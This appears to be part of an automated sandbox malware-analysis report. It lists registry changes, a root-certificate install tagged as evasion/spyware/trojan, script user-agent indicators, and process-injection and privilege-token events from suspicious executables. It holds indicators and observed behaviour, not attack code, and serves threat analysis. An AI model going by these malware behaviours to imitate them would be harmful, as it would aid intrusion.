Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\ = "NucleusToastActivator Class"	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{389510B7-9E58-40D7-98BF-60B911CB0EA9}\TYPELIB	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{99C9CDE9-ABE3-4B2A-9806-7EC878C1D0DB} = "0"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler\ = "FileSyncClient AutoPlayHandler Class"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\SyncEngineCOMServer.SyncEngineCOMServer.1	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\vg35.xyz\Total = "0"	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\FILESYNCCLIENT.FILESYNCCLIENT\CLSID	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\0\win32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusNativeMessaging.NucleusNativeMessaging.1\ = "NucleusNativeMessaging Class"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.propapps.info	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\INPROCSERVER32	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.propapps.info\ = "0"	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\ = "IGetSyncStatusCallback"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusToastActivator.NucleusToastActivator	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INSTANCE\INITPROPERTYBAG	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{C1439245-96B4-47FC-B391-679386C5D40F}\TYPELIB	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Directory\Background\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{0F872661-C863-47A4-863F-C065C182858A}\TYPELIB	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.FileSyncClient\CLSID\ = "{7B37E4E2-C62F-4914-9620-8FB5062718CC}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\ = "SharedOverlayHandler Class"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.150.0725.0001\\FileCoAuth.exe\""	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	64	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	134	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
4820	rundll32.exe
4820	rundll32.exe
1912	svchost.exe
1912	svchost.exe
1832	Fri15af75ee9b.exe
1832	Fri15af75ee9b.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
5708	WerFault.exe
2800	Process not Found
2800	Process not Found
2800	Process not Found
2800	Process not Found
2800	Process not Found
2800	Process not Found
2800	Process not Found
2800	Process not Found
5188	setup_2.tmp

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2800	Process not Found

Suspicious behavior: MapViewOfSection 20 IoCs

pid	Process
1832	Fri15af75ee9b.exe
7220	MicrosoftEdgeCP.exe
7220	MicrosoftEdgeCP.exe
5472	thrbucb
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
5116	thrbucb
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
5704	thrbucb
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
5476	6686198.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1716	Fri1553f0ee90.exe
Token: SeDebugPrivilege	1680	Fri155442fc38b.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	4416	2.exe
Token: SeDebugPrivilege	2176	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	4756	8395340.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	1912	svchost.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	4740	WerFault.exe
Token: SeDebugPrivilege	4820	rundll32.exe
